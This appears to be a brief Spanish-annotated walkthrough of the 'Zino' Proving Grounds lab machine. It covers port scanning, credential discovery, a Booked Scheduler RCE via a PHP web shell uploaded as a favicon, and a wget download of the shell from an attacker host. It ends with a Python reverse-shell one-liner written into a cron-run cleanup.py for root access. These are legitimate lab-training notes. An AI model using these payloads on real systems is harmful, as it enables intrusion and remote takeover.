Zino
ProvingGrounds Windows
nmap -A -p- -oA zino 192.168.139.64 —min-rate=10000 —script=vuln —script-timeout=15 -v
nmap -sC -sV -O -p- -oA zino 192.168.139.64
nmap -sU -O -p- -oA zino-udp 192.168.139.64
nikto -h 192.168.139.64:80
smbclient \\192.168.139.64\zino
cat misc.log
cat auth.log
https://github.com/F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF
Credenciales admin:adminadmin
http://192.168.xx.xx/Web/admin/manage_theme.php
Subimos el archivo con el reverse shell en la parte del medio donde dice favion.ico
https://github.com/artyuum/Simple-PHP-Web-Shell
python3 -m http.server 80
wget http://192.168.49.123:21/shell.php
Ejecutamos lo siguiente:
php shell.php
nc -lvnp 21
python3 -m http.server 21
En linpeas.sh vemos el archivo cleanup.py en /var/www/html/booked
cd /var/www/html/booked
echo ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.49.123”,21));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’ > cleanup.py
nc -lvnp 21
